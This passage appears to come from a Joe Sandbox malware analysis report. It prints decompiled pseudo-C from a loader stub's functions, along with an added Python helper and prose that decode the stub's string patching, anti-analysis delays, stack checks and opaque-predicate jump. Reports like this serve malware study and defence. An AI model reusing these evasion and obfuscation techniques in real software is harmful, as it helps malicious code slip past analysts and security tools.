    							goto L18;
    						}
    						__eflags = _t56 - 0xfd00;
    						if(_t56 < 0xfd00) {
    							goto L17;
    						}
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t23 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t23;
    						_t44 = "pejpCreate";
    						 *_t44 = 0x70616548;
    						 *((short*)(_t44 + 4)) = 0x7243;
    						 *((short*)(_t44 + 6)) = 0x6165;
    						_push(_t44);
    						_push(_t23);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t23);
    						_push(1);
    						 *_t59 =  *_t59 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t24 = E00401CAE(_t23); // executed
    						__eflags = _t24;
    						if(_t24 != 0) {
    							goto L17;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t27 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						_v8 = _t27;
    						_push(_t27);
    						__eflags = _t27;
    						if(_t27 == 0) {
    							goto L17;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t28 = E00402E18(_t27); // executed
    						_push("true");
    						 *_t59 =  *_t59 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t29 = E00402BB3(_t28); // executed
    						__eflags = _t29;
    						if(_t29 != 0) {
    							goto L17;
    						}
    						_push(0x1e);
    						do {
    							_t31 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t59 =  *_t59 - 1;
    							__eflags =  *_t59;
    						} while ( *_t59 != 0);
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t31); // executed
    						_pop(_t49);
    						 *((intOrPtr*)(_t59 + 4)) =  *((intOrPtr*)(_t59 + 4)) +  *((intOrPtr*)(_t49 + 0x3c));
    						_t53 = _t49;
    						 *0x405002 = _t53 + 0xa4;
    						_t33 =  *0x405002;
    						_t34 =  *_t33;
    						 *0x405002 = _t34;
    						__eflags =  *0x405002 - 0xfff;
    						if(__eflags > 0) {
    							goto L17;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(__eflags < 0) {
    							goto L17;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t39);
    						 *0x40501a =  *0x40501a + _t39;
    						__eflags = _v8 - 0xffffffff;
    						if(_v8 != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    					_push(1);
    					 *_t59 =  *_t59 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf");
    					if(_t18 != 0) {
    						goto L5;
    					}
    					_push("zzdjjqpqaxlgt");
    					_t42 = E00402E18(_t18);
    					_push(1);
    					 *_t59 =  *_t59 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf");
    					if(E00401CAE(_t42) != 0) {
    						goto L5;
    					}
    					_push(E0040123E);
    					return E0040123E;
    				} else {
    					_push(1);
    					 *__esp =  *__esp - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					__eax = E00401CAE(__eax); // executed
    					__eflags = __eax;
    					if(__eax != 0) {
    						goto L1;
    					} else {
    						_push("zzdjjqpqaxlgt"); // executed
    						__eax = E00402E18(__eax); // executed
    						__eax = 0x401e1e;
    						_push(0x401e1e);
    						return 0x401e1e;
    					}
    				}
    			}

    Address column (one instruction address per decompiled line above, detached from the code in extraction): the body of _entry_ lies at 0x00402ad7-0x00402b50 and 0x004012d9-0x00401355, plus the shared block at 0x00401e1e-0x00401fd9 and 0x00402749-0x0040274c.

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
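
    Every decompiled function shown here funnels into the same block (the address ranges listed under each include 0x00401e1e-0x00401fd9), and that block is where the stub conceals what it is about to do: it overwrites the decoy literal "pejpCreate" in place with the dword 0x70616548 and the words 0x7243 and 0x6165, stores the bytes 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33 one at a time into a buffer, patches two wide characters of a string before passing it to LoadLibraryExW, and reaches `goto __eax` through add, sub and xor arithmetic on the two code addresses E004019C6 and E00402749. The script below is an added analysis helper, not part of the Joe Sandbox report and not code from the sample. It parses store statements in the form the HCA plugin prints, rebuilds the buffers those stores produce, and evaluates the jump-target arithmetic for both branches. Its assumptions are marked in the code: the width of an uncast store is inferred from the size of the literal; M00405038 is taken to be the second wide character of the "oidsapi.dll" literal, which the page does not state; and the module handle passed to dispatch_target is a made-up value. The sample input is a verbatim copy of the statements on this page.

```python
"""Recover what the decompiled stub on this page hides from static analysis.

Added analysis helper; not part of the Joe Sandbox report or of the sample.
It parses pseudo-C store statements in the form the HCA plugin prints,
rebuilds the buffers they produce, and mirrors the arithmetic behind the
block's final `goto __eax`.
"""
import re

# Constructed input: statements copied from the shared block of the decompiled
# functions on this page (byte stores at 0x305061.. and the "pejpCreate" patch).
SAMPLE = """
 *0x305061 = 0x6b;
 *0x00305062 = 0x65;
 *0x00305063 = 0x72;
 *0x00305064 = 0x6e;
 *0x00305065 = 0x65;
 *0x00305066 = 0x6c;
 *0x00305067 = 0x33;
_t45 = "pejpCreate";
 *_t45 = 0x70616548;
 *((short*)(_t45 + 4)) = 0x7243;
 *((short*)(_t45 + 6)) = 0x6165;
"""

WIDTH = {"char": 1, "short": 2, "int": 4, "long": 4, "intOrPtr": 4}
SEED_RE = re.compile(r'^\s*(_t\d+)\s*=\s*"([^"]*)";')      # _t45 = "pejpCreate";
CAST_RE = re.compile(                                       # *((short*)(_t45 + 4)) = 0x7243;
    r'^\s*\*\(\((\w+)\*\)\((\w+)\s*\+\s*(0x[0-9a-fA-F]+|\d+)\)\)\s*=\s*(0x[0-9a-fA-F]+);')
PLAIN_RE = re.compile(r'^\s*\*(0x[0-9a-fA-F]+|_t\d+)\s*=\s*(0x[0-9a-fA-F]+);')  # *0x305061 = 0x6b;


def _width_from_value(value):
    # Assumption: an uncast store is as wide as its literal needs (byte, word, dword).
    return 1 if value <= 0xFF else 2 if value <= 0xFFFF else 4


def parse_stores(text):
    """Map each destination buffer to [seed literal or None, {offset: (width, value)}].

    Stores through absolute addresses share the key 'abs'; their offsets are the
    raw addresses and rebuild_buffers() rebases them to the lowest one.
    """
    buffers = {}
    for line in text.splitlines():
        if m := SEED_RE.match(line):
            buffers.setdefault(m.group(1), [None, {}])[0] = m.group(2)
        elif m := CAST_RE.match(line):
            ctype, base, off, val = m.groups()
            offset = int(off, 16) if off.startswith("0x") else int(off)
            buffers.setdefault(base, [None, {}])[1][offset] = (WIDTH[ctype], int(val, 16))
        elif m := PLAIN_RE.match(line):
            target, val = m.groups()
            value = int(val, 16)
            key, offset = ("abs", int(target, 16)) if target.startswith("0x") else (target, 0)
            buffers.setdefault(key, [None, {}])[1][offset] = (_width_from_value(value), value)
    return buffers


def rebuild_buffers(buffers):
    """Apply the stores little-endian (x86) over each seed and decode the bytes."""
    result = {}
    for name, (seed, stores) in buffers.items():
        if not stores:
            continue
        base = min(stores) if name == "abs" else 0
        buf = bytearray(seed.encode("latin-1")) if seed else bytearray()
        for offset, (width, value) in sorted(stores.items()):
            rel = offset - base
            buf.extend(b"\x00" * max(0, rel + width - len(buf)))
            buf[rel:rel + width] = value.to_bytes(width, "little")
        label = f"@0x{base:08x}" if name == "abs" else name
        result[label] = buf.rstrip(b"\x00").decode("latin-1")
    return result


def decode_wide_patches(literal, byte_stores):
    """Apply {byte_offset: value} to a decompiler L"" literal held as UTF-16LE."""
    buf = bytearray(literal.encode("utf-16-le"))
    for offset, value in byte_stores.items():
        buf[offset] = value
    return buf.decode("utf-16-le")


def dispatch_target(module_handle, e_004019c6=0x004019C6, e_00402749=0x00402749):
    """Mirror the *0x40501a arithmetic that feeds `goto __eax`: start at E004019C6,
    add E00402749, then subtract it back (handle != -1) or xor with E004019C6 (handle == -1)."""
    mask = 0xFFFFFFFF
    t = (e_004019c6 + e_00402749) & mask
    if module_handle != 0xFFFFFFFF:
        return (t - e_00402749) & mask
    return t ^ e_004019c6


if __name__ == "__main__":
    for name, text in rebuild_buffers(parse_stores(SAMPLE)).items():
        print(f"{name}: {text!r}")
    # Assumption: M00405038 is the second wide character of the "oidsapi.dll" literal.
    print(decode_wide_patches("oidsapi.dll", {0: 0x6E, 2: 0x74}))
    # Made-up module handle versus the -1 handle the xor branch would need.
    print(hex(dispatch_target(0x76C00000)), hex(dispatch_target(0xFFFFFFFF)))
```

    Running it prints HeapCreate (the literal with its first eight bytes replaced), kernel3 (the seven bytes stored just before the LoadLibraryA("kernel32.dll") call) and, under the stated assumption, ntdsapi.dll. The dispatch arithmetic is an opaque predicate: the value compared against 0xffffffff is the LoadLibraryExW result, which is NULL on failure (already caught by the earlier `== 0` test) and never -1, so the xor branch is dead and the only live successor of the block is E004019C6; the dead branch would land at 0x00c058c9, outside the module's address range shown in the memory dump sources. The gates that precede it, the `< 0xfd00` test on the frame pointer (which fails on an abnormally low stack) and thirty WaitForSingleObject(0xffffffff, 1) calls (a one-millisecond timeout on the current-process pseudo-handle, which never signals, used in place of Sleep), are the stub's anti-analysis checks; any of them failing sends execution to the self-looping label.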
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 44%
    			E004020F1(signed int __eax) {
    				void* _t13;
    				void* _t14;
    				void* _t16;
    				void* _t17;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				struct HINSTANCE__* _t25;
    				void* _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr* _t31;
    				intOrPtr _t32;
    				void* _t37;
    				signed int _t38;
    				void* _t39;
    				void* _t43;
    				intOrPtr* _t45;
    				void* _t49;
    				void* _t53;
    				void* _t55;
    				intOrPtr* _t57;
    				void* _t66;
    
    				_t13 = E00402AD0(__eax ^ 0x004050cf);
    				_push("zzdjjqpqaxlgt");
    				_t14 = E00402E18(_t13);
    				_push(0xf);
    				 *_t57 =  *_t57 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t14) != 0) {
    					L18:
    					_push("zzdjjqpqaxlgt");
    					_t16 = E00402E18(_t15);
    					_push(0xf);
    					 *_t57 =  *_t57 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(E00402BB3(_t16) != 0) {
    						L1:
    						_push(1);
    						 *_t57 =  *_t57 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t17 = E00401CAE(_t15); // executed
    						if(_t17 != 0 || _t55 < 0xfd00) {
    							L16:
    							L17:
    							goto L17;
    						} else {
    							 *0x305061 = 0x6b;
    							 *0x00305062 = 0x65;
    							 *0x00305063 = 0x72;
    							 *0x00305064 = 0x6e;
    							 *0x00305065 = 0x65;
    							 *0x00305066 = 0x6c;
    							 *0x00305067 = 0x33;
    							_t21 = LoadLibraryA("kernel32.dll");
    							 *0x40500e = _t21;
    							_t45 = "pejpCreate";
    							 *_t45 = 0x70616548;
    							 *((short*)(_t45 + 4)) = 0x7243;
    							 *((short*)(_t45 + 6)) = 0x6165;
    							_push(_t45);
    							_push(_t21);
    							_push(__imp__LoadLibraryExW);
    							_pop( *0x40500a);
    							_push(_t21);
    							_push(1);
    							 *_t57 =  *_t57 - 1;
    							_push("vwzhywkzcohliu");
    							_push("oledcrpjmksdjf"); // executed
    							_t22 = E00401CAE(_t21); // executed
    							if(_t22 != 0) {
    								goto L16;
    							}
    							L"oidsapi.dll" = 0x6e;
    							M00405038 = 0x74;
    							_t25 = LoadLibraryExW( &((L"")[1]), 0, 0);
    							 *((intOrPtr*)(_t55 - 4)) = _t25;
    							_push(_t25);
    							if(_t25 == 0) {
    								goto L16;
    							}
    							_push("zzdjjqpqaxlgt"); // executed
    							_t26 = E00402E18(_t25); // executed
    							_push("true");
    							 *_t57 =  *_t57 - 1;
    							_push(0x4050b3);
    							_push("bkktdsxxkjueaz"); // executed
    							_t27 = E00402BB3(_t26); // executed
    							if(_t27 != 0) {
    								goto L16;
    							}
    							_push(0x1e);
    							do {
    								_t29 = WaitForSingleObject(0xffffffff, 1); // executed
    								 *_t57 =  *_t57 - 1;
    							} while ( *_t57 != 0);
    							_t57 = _t57 + 4;
    							 *0x40501a = 0;
    							_push("zzdjjqpqaxlgt"); // executed
    							E00402E18(_t29); // executed
    							_pop(_t49);
    							 *_t57 =  *_t57 +  *((intOrPtr*)(_t49 + 0x3c));
    							_t53 = _t49;
    							 *0x405002 = _t53 + 0xa4;
    							_t31 =  *0x405002;
    							_t32 =  *_t31;
    							 *0x405002 = _t32;
    							_t66 =  *0x405002 - 0xfff;
    							if(_t66 > 0) {
    								goto L16;
    							}
    							asm("sbb dword [ecx], 0xa0");
    							if(_t66 < 0) {
    								goto L16;
    							}
    							 *0x405016 = GetProcAddress();
    							LoadLibraryA("kernel32.dll");
    							 *0x40501a = E004019C6;
    							_push(E00402749);
    							_pop(_t37);
    							 *0x40501a =  *0x40501a + _t37;
    							if( *((intOrPtr*)(_t55 - 4)) != 0xffffffff) {
    								 *0x40501a =  *0x40501a - E00402749;
    								_t38 =  *0x40501a; // 0x0
    								goto __eax;
    							}
    							 *0x40501a =  *0x40501a ^ E004019C6;
    							goto __eax;
    						}
    					}
    					_push( *0x4050cf);
    					_t43 = E00402AD0(_t15);
    					_push(0xf);
    					 *_t57 =  *_t57 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(E00402BB3(_t43) != 0) {
    						goto L1;
    					}
    					_push(0xf);
    					 *_t57 =  *_t57 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(_t15 != 0) {
    						goto L1;
    					}
    					_push(0xf);
    					 *_t57 =  *_t57 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(_t15 != 0) {
    						goto L1;
    					}
    					_push(E004016FF);
    					return E004016FF;
    				} else {
    					_push(1);
    					 *_t57 =  *_t57 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf");
    					if(E00401CAE(_t38) != 0) {
    						goto L18;
    					} else {
    						_push(0xf);
    						 *_t57 =  *_t57 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz");
    						if(_t15 != 0) {
    							goto L18;
    						} else {
    							_push( *0x4050cf);
    							_t39 = E00402AD0(_t15);
    							_push( *0x4050cf);
    							E00402AD0(_t39);
    							_push(0x401e1e);
    							return 0x401e1e;
    						}
    					}
    				}
			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 48%
    			E00401130() {
    				void* _t11;
    				intOrPtr _t13;
    				intOrPtr _t14;
    				struct HINSTANCE__* _t18;
    				intOrPtr _t19;
    				struct HINSTANCE__* _t22;
    				void* _t23;
    				intOrPtr _t24;
    				long _t26;
    				intOrPtr* _t28;
    				intOrPtr _t29;
    				void* _t34;
    				void* _t37;
    				void* _t38;
    				void* _t39;
    				void* _t42;
    				intOrPtr* _t44;
    				void* _t48;
    				void* _t52;
    				void* _t54;
    				intOrPtr* _t56;
    
    				_push(1);
    				 *_t56 =  *_t56 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t11) != 0) {
    					L5:
    					_push(1);
    					 *_t56 =  *_t56 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf");
    					_t13 = E00401CAE(_t12);
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L8:
    						_push(1);
    						 *_t56 =  *_t56 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t14 = E00401CAE(_t13); // executed
    						__eflags = _t14;
    						if(_t14 != 0) {
    							L20:
    							L21:
    							goto L21;
    						}
    						__eflags = _t54 - 0xfd00;
    						if(_t54 < 0xfd00) {
    							goto L20;
    						}
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t18 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t18;
    						_t44 = "pejpCreate";
    						 *_t44 = 0x70616548;
    						 *((short*)(_t44 + 4)) = 0x7243;
    						 *((short*)(_t44 + 6)) = 0x6165;
    						_push(_t44);
    						_push(_t18);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t18);
    						_push(1);
    						 *_t56 =  *_t56 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t19 = E00401CAE(_t18); // executed
    						__eflags = _t19;
    						if(_t19 != 0) {
    							goto L20;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t54 - 4)) = _t22;
    						_push(_t22);
    						__eflags = _t22;
    						if(_t22 == 0) {
    							goto L20;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t23 = E00402E18(_t22); // executed
    						_push("true");
    						 *_t56 =  *_t56 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t24 = E00402BB3(_t23); // executed
    						__eflags = _t24;
    						if(_t24 != 0) {
    							goto L20;
    						}
    						_push(0x1e);
    						do {
    							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t56 =  *_t56 - 1;
    							__eflags =  *_t56;
    						} while ( *_t56 != 0);
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t26); // executed
    						_pop(_t48);
    						 *((intOrPtr*)(_t56 + 4)) =  *((intOrPtr*)(_t56 + 4)) +  *((intOrPtr*)(_t48 + 0x3c));
    						_t52 = _t48;
    						 *0x405002 = _t52 + 0xa4;
    						_t28 =  *0x405002;
    						_t29 =  *_t28;
    						 *0x405002 = _t29;
    						__eflags =  *0x405002 - 0xfff;
    						if(__eflags > 0) {
    							goto L20;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(__eflags < 0) {
    							goto L20;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t34);
    						 *0x40501a =  *0x40501a + _t34;
    						__eflags =  *((intOrPtr*)(_t54 - 4)) - 0xffffffff;
    						if( *((intOrPtr*)(_t54 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    					_push(0xf);
    					 *_t56 =  *_t56 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					_t13 = E00402BB3(_t13);
    					__eflags = _t13;
    					if(_t13 != 0) {
    						goto L8;
    					}
    					_push("zzdjjqpqaxlgt");
    					_t37 = E00402E18(_t13);
    					_push("zzdjjqpqaxlgt");
    					_t38 = E00402E18(_t37);
    					_push( *0x4050cf);
    					_t39 = E00402AD0(_t38);
    					_push( *0x4050cf);
    					E00402AD0(_t39);
    					_push(E0040299E);
    					return E0040299E;
    				} else {
    					_push("zzdjjqpqaxlgt");
    					_t42 = E00402E18(_t12);
    					_push(0xf);
    					 *_t56 =  *_t56 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(E00402BB3(_t42) != 0) {
    						goto L5;
    					} else {
    						_push(1);
    						 *_t56 =  *_t56 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf");
    						if(_t12 != 0) {
    							goto L5;
    						} else {
    							_push(1);
    							 *_t56 =  *_t56 - 1;
    							_push("vwzhywkzcohliu");
    							_push("oledcrpjmksdjf");
    							if(_t12 != 0) {
    								goto L5;
    							} else {
    								_push(0x401e1e);
    								return 0x401e1e;
    							}
    						}
    					}
    				}
			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 45%
    			E004026E8() {
    				void* _t11;
    				void* _t12;
    				void* _t13;
    				void* _t14;
    				void* _t15;
    				void* _t17;
    				void* _t18;
    				struct HINSTANCE__* _t22;
    				void* _t23;
    				struct HINSTANCE__* _t26;
    				void* _t27;
    				void* _t28;
    				long _t30;
    				intOrPtr* _t32;
    				intOrPtr _t33;
    				void* _t38;
    				signed int _t39;
    				void* _t43;
    				void* _t44;
    				intOrPtr* _t46;
    				void* _t50;
    				void* _t54;
    				void* _t56;
    				intOrPtr* _t58;
    				void* _t68;
    
    				_push("zzdjjqpqaxlgt");
    				_t12 = E00402E18(_t11);
    				_push( *0x4050cf);
    				_t13 = E00402AD0(_t12);
    				_push("zzdjjqpqaxlgt");
    				_t14 = E00402E18(_t13);
    				_push("zzdjjqpqaxlgt");
    				_t15 = E00402E18(_t14);
    				_push(0xf);
    				 *_t58 =  *_t58 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t15) != 0) {
    					_push("zzdjjqpqaxlgt");
    					_t17 = E00402E18(_t16);
    					_push(1);
    					 *_t58 =  *_t58 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf");
    					if(E00401CAE(_t17) != 0) {
    						L1:
    						_push(1);
    						 *_t58 =  *_t58 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t18 = E00401CAE(_t16); // executed
    						if(_t18 != 0 || _t56 < 0xfd00) {
    							L14:
    							L15:
    							goto L15;
    						} else {
    							 *0x305061 = 0x6b;
    							 *0x00305062 = 0x65;
    							 *0x00305063 = 0x72;
    							 *0x00305064 = 0x6e;
    							 *0x00305065 = 0x65;
    							 *0x00305066 = 0x6c;
    							 *0x00305067 = 0x33;
    							_t22 = LoadLibraryA("kernel32.dll");
    							 *0x40500e = _t22;
    							_t46 = "pejpCreate";
    							 *_t46 = 0x70616548;
    							 *((short*)(_t46 + 4)) = 0x7243;
    							 *((short*)(_t46 + 6)) = 0x6165;
    							_push(_t46);
    							_push(_t22);
    							_push(__imp__LoadLibraryExW);
    							_pop( *0x40500a);
    							_push(_t22);
    							_push(1);
    							 *_t58 =  *_t58 - 1;
    							_push("vwzhywkzcohliu");
    							_push("oledcrpjmksdjf"); // executed
    							_t23 = E00401CAE(_t22); // executed
    							if(_t23 != 0) {
    								goto L14;
    							}
    							L"oidsapi.dll" = 0x6e;
    							M00405038 = 0x74;
    							_t26 = LoadLibraryExW( &((L"")[1]), 0, 0);
    							 *((intOrPtr*)(_t56 - 4)) = _t26;
    							_push(_t26);
    							if(_t26 == 0) {
    								goto L14;
    							}
    							_push("zzdjjqpqaxlgt"); // executed
    							_t27 = E00402E18(_t26); // executed
    							_push("true");
    							 *_t58 =  *_t58 - 1;
    							_push(0x4050b3);
    							_push("bkktdsxxkjueaz"); // executed
    							_t28 = E00402BB3(_t27); // executed
    							if(_t28 != 0) {
    								goto L14;
    							}
    							_push(0x1e);
    							do {
    								_t30 = WaitForSingleObject(0xffffffff, 1); // executed
    								 *_t58 =  *_t58 - 1;
    							} while ( *_t58 != 0);
    							 *0x40501a = 0;
    							_push("zzdjjqpqaxlgt"); // executed
    							E00402E18(_t30); // executed
    							_pop(_t50);
    							 *((intOrPtr*)(_t58 + 4)) =  *((intOrPtr*)(_t58 + 4)) +  *((intOrPtr*)(_t50 + 0x3c));
    							_t54 = _t50;
    							 *0x405002 = _t54 + 0xa4;
    							_t32 =  *0x405002;
    							_t33 =  *_t32;
    							 *0x405002 = _t33;
    							_t68 =  *0x405002 - 0xfff;
    							if(_t68 > 0) {
    								goto L14;
    							}
    							asm("sbb dword [ecx], 0xa0");
    							if(_t68 < 0) {
    								goto L14;
    							}
    							 *0x405016 = GetProcAddress();
    							LoadLibraryA("kernel32.dll");
    							 *0x40501a = E004019C6;
    							_push(E00402749);
    							_pop(_t38);
    							 *0x40501a =  *0x40501a + _t38;
    							if( *((intOrPtr*)(_t56 - 4)) != 0xffffffff) {
    								 *0x40501a =  *0x40501a - E00402749;
    								_t39 =  *0x40501a; // 0x0
    								goto __eax;
    							}
    							 *0x40501a =  *0x40501a ^ E004019C6;
    							goto __eax;
    						}
    					}
    					_push(0xf);
    					 *_t58 =  *_t58 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(_t16 != 0) {
    						goto L1;
    					}
    					_push( *0x4050cf);
    					_t43 = E00402AD0(_t16);
    					_push(0xf);
    					 *_t58 =  *_t58 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(E00402BB3(_t43) != 0) {
    						goto L1;
    					}
    					_push( *0x4050cf);
    					_t44 = E00402AD0(_t16);
    					_push(0xf);
    					 *_t58 =  *_t58 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(E00402BB3(_t44) != 0) {
    						goto L1;
    					}
    					_push(E00402868);
    					return E00402868;
    				} else {
    					_push( *0x4050cf);
    					E00402AD0(_t39);
    					_push(0x401e1e);
    					return 0x401e1e;
    				}
			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 50%
    			E00401557() {
    				void* _t11;
    				void* _t12;
    				void* _t13;
    				void* _t14;
    				void* _t16;
    				intOrPtr _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t22;
    				intOrPtr _t23;
    				struct HINSTANCE__* _t26;
    				void* _t27;
    				intOrPtr _t28;
    				long _t30;
    				intOrPtr* _t32;
    				intOrPtr _t33;
    				void* _t38;
    				void* _t40;
    				intOrPtr* _t45;
    				void* _t49;
    				void* _t53;
    				void* _t55;
    				intOrPtr* _t57;
    
    				_push("zzdjjqpqaxlgt");
    				_t12 = E00402E18(_t11);
    				_push("zzdjjqpqaxlgt");
    				_t13 = E00402E18(_t12);
    				_push( *0x4050cf);
    				_t14 = E00402AD0(_t13);
    				_push(0xf);
    				 *_t57 =  *_t57 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t14) != 0) {
    					L15:
    					_push( *0x4050cf);
    					_t16 = E00402AD0(_t15);
    					_push(0xf);
    					 *_t57 =  *_t57 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					_t17 = E00402BB3(_t16);
    					__eflags = _t17;
    					if(_t17 != 0) {
    						L3:
    						_push(1);
    						 *_t57 =  *_t57 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t18 = E00401CAE(_t17); // executed
    						__eflags = _t18;
    						if(_t18 != 0) {
    							L18:
    							L19:
    							goto L19;
    						}
    						__eflags = _t55 - 0xfd00;
    						if(_t55 < 0xfd00) {
    							goto L18;
    						}
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t22 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t22;
    						_t45 = "pejpCreate";
    						 *_t45 = 0x70616548;
    						 *((short*)(_t45 + 4)) = 0x7243;
    						 *((short*)(_t45 + 6)) = 0x6165;
    						_push(_t45);
    						_push(_t22);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t22);
    						_push(1);
    						 *_t57 =  *_t57 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
